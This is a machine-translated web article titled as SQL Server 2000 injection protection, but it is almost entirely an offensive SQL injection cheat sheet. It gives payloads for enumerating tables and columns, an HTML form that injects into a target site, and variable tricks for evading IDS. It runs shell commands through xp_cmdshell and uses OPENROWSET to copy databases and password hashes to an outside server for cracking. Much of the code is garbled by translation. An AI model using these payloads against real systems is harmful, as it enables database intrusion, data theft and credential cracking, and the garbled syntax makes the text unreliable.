SQL Server 2000 Injection Protection (2)

Source: Internet
Author: User

SQL Server 2000 Injection Protection (2)

Traditional query structure:
Select * FROM news where id =... AND topic =... AND .....
Admin 'and 1 = (select count (*) from [user] where username = 'victime' and right (left (userpass, 01), 1) = '1 ') and userpass <>'
Select 123 ;--
; Use master ;--
: A' or name like 'fff % '; -- a user named ffff is displayed.
'And 1 <> (select count (email) from [user]); --
; Update [users] set email = (select top 1 name from sysobjects where xtype = 'U' and status> 0) where name = 'ffffff ';--

Note:
The preceding statement is used to obtain the first user table in the database and put the table name in the ffff user's mailbox field.
By viewing ffff user information, you can obtain the first table named ad.
Then, the table ID is obtained based on the table name ad.
Ffff'; update [users] set email = (select top 1 id from sysobjects where xtype = 'U' and name = 'ad') where name = 'ffffff ';--

In this way, you can get the name of the second table.
Ffff'; update [users] set email = (select top 1 name from sysobjects where xtype = 'U' and id> 581577110) where name = 'ffffff ';--
Ffff'; update [users] set email = (select top 1 count (id) from password) where name = 'ffffff ';--
Ffff'; update [users] set email = (select top 1 pwd from password where id = 2)
Where name = 'ffff ';--

Ffff'; update [users] set email = (select top 1 name from password where id = 2)
Where name = 'ffff ';--

Exec master.. xp_servicecontrol 'start', 'schedule'
Exec master .. xp_servicecontrol 'start', 'server'
Sp_addextendedproc 'xp _ webserver', 'c: \ temp \ xp_foo.dll'

Extended storage can be called using the following methods:
Exec xp_webserver

Once the extended storage is executed, you can delete it as follows:
Sp_dropextendedproc 'xp _ webserver'

Insert into users values (666, char (0x63) + char (0x68) + char (0x72) +
Char (0x69) + char (0x73), char (0x63) + char (0x68) + char (0x72) + char (0x69) + char (0x73), 0 xffff )-

Insert into users values (667,123,123, 0 xffff )-

Insert into users values (123, 'admin' '--', 'Password', 0 xffff )-

; And user> 0
; And (select count (*) from sysobjects)> 0
; And (select count (*) from mysysobjects)> 0 // access Database

Introduction to injection:
A) ID = 49 These injection parameters are numeric. The SQL statement is roughly as follows:
Select * from table name where field = 49
The injected parameter is ID = 49 And [query condition], that is, the generated statement:
Select * from table name where field = 49 And [query condition]

(B) Class = the injection parameters of the series are simplified. The SQL statements are roughly as follows:
Select * from table name where field = 'series'
The injected parameters are Class = series and [query conditions] and ''= ', that is, the generated statement:
Select * from table name where field = 'series' and [query conditions] and ''=''

(C) If parameters are not filtered during search, such as keyword = keyword, the original appearance of the SQL statement is roughly as follows:
Select * from table name where field like '% keyword %'
The injected parameter is keyword = 'and [query condition] and' % 25' = ', which is the generated statement:
Select * from table name where field like '%' and [query condition] and '%' = '%'
; And (select Top 1 name from sysobjects where xtype = 'U' and status> 0)> 0
Sysobjects is a system table of SQLServer. It stores all table names, views, constraints, and other objects. xtype = 'U' and status> 0 indicates the table name created by the user, the preceding statement extracts the first table name and compares it with 0 to expose the table name with an error message.

; And (select Top 1 col_name (object_id ('table name'), 1) from sysobjects)> 0
After obtaining the table name from ⑤, use object_id ('table name') to obtain the internal ID corresponding to the table name. col_name (table name ID, 1) represents the 1st field names of the table, replace 1 with 2, 3, 4... you can obtain the field names in the table to be guessed one by one.

Post.htm content: easy to input.

<Iframe name = p src = # width = 800 height = 350 frameborder = 0> </iframe>
<Br>
<Form action = http://test.com/count.asp target = p>
<Input name = "id" value = "1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = 'U' and status> 0 ); -- "style =" width: 750 ">
<Input type = submit value = ">>>">
<Input type = hidden name = fno value = "2, 3">
</Form>

Name of his data table:
Id = 1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = 'U' and status> 0 );--

This is to update the first table name to the aaa field.

Read the first table, and the second table can be read as follows (ADD and name <> 'table name just obtained 'After the condition ').
Id = 1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name <> 'Vote ');--

Then id = 1552 and exists (select * from aaa where aaa> 5)

Read the second table and read it one by one until it does not exist.

The read field is as follows:
Id = 1552; update aaa set aaa = (select top 1 col_name (object_id ('table name'), 1 ));--

Then id = 1552 and exists (select * from aaa where aaa> 5) error.
Id = 1552; update aaa set aaa = (select top 1 col_name (object_id ('table name'), 2 ));--
Then id = 1552 and exists (select * from aaa where aaa> 5) error.

Advanced Skills:

[Retrieve data table name] [update the field value to the table name, and read the value of this field to get the table name]
Update table name set field = (select top 1 name from sysobjects where xtype = u and status> 0 [and name <> 'your obtained table name' find one and add one]) [where condition]
Select top 1 name from sysobjects where xtype = u and status> 0 and name not in ('table1', 'table2 ',...)

Create a database administrator account and a system administrator account through SQLSERVER injection vulnerability [the current account must be a SYSADMIN Group]

[Obtain the field name of a data table] [update the field value to the field name, and then read the value of this field to obtain the field name]
Update table name set field = (select top 1 col_name (object_id ('name of the data table to be queried '), field column such as: 1) [where condition]

Bypassing IDS detection [using variables]
Declare @ a sysname set @ a = 'xp _ '+ 'your shell' exec @ a' dir c :\'
Declare @ a sysname set @ a = 'xp '+' _ cm '+ 'dshell' exec @ a' dir c :\'

1. enable remote database
Basic syntax
Select * from OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123 ', 'select * from table1 ')

Parameter: (1) OLEDB Provider name

2. The connection string parameter can be any port used for connection, for example
Select * from OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from table'

To copy the entire database of the target host, you must first establish a connection with the database on the target host (how to establish a remote connection on the target host, as mentioned earlier ), then insert all remote tables to the local table.

Basic Syntax:
Insert into OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123 ', 'select * from table1') select * from table2

This line of statements copies all the data in table 2 on the target host to table 1 in the remote database. In actual use, modify the IP address and port of the connection string to point to the desired location, for example:
Insert into OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from table1') select * from table2

Insert into OPENROWSET ('sqloledb', 'uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from _ sysdatabases ')
Select * from master. dbo. sysdatabases

Insert into OPENROWSET ('sqloledb', 'uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from _ sysobjects ')
Select * from user_database.dbo.sysobjects

Insert into OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from _ syscolumns ')
Select * from user_database.dbo.syscolumns

Then, you can see the database structure of the target host from the local database. This is easy to say. Copy the database:
Insert into OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from table1 ') select * from database .. table1

Insert into OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from table2 ') select * from database .. table 2

......

3. Copy the HASH table)

This is actually an extended application of the replication database. The hash of the logon password is stored in sysxlogins. The method is as follows:
Insert into OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from _ sysxlogins ') select * from database. dbo. sysxlogins

After obtaining the hash, you can perform brute-force cracking. This requires a lot of luck and time.

How to traverse a directory:
First create a temporary table: temp
'5; create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
5'; insert temp exec master. dbo. xp_availablemedia; -- get all current drives
5'; insert into temp (id) exec master. dbo. xp_subdirs 'C: \ '; -- get the subdirectory list
5'; insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: \ '; -- get the directory tree structure of all subdirectories and import them to the temp table.

5'; insert into temp (id) exec master. dbo. xp_mongoshell 'Type c: \ web \ index. asp '; -- view the content of a file
5'; insert into temp (id) exec master. dbo. xp_mongoshell 'dir c :\';--
5'; insert into temp (id) exec master. dbo. xp_mongoshell 'dir c: \ *. asp/s/';--
5'; insert into temp (id) exec master. dbo. xp_mongoshell 'cscript C: \ Inetpub \ AdminScripts \ adsutil. vbs enum w3svc'

5'; insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: \ '; -- (permission PUBLIC applies to xp_dirtree)
Write table:
Statement 1: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('sysadmin '));--
Statement 2: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('serveradmin '));--
Statement 3: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('setupadmin '));--
Statement 4: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('securityadmin '));--
Statement 5: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('securityadmin '));--
Statement 6: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('diskadmin '));--
Statement 7: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('bulkadmin '));--
Statement 8: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('bulkadmin '));--
Statement 9: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select IS_MEMBER ('db _ owner '));--
Write the path to the table:
_ Blank> http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs (paths varchar (100), id int )-
_ Blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree 'C :\'-
_ Blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
_ Blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs where paths not in ('@ inetpub '))-
Statement: _ blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs1 (paths varchar (100), id int )--
Statement: _ blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree 'e: \ web '--
Statement: _ blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs1 )-

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.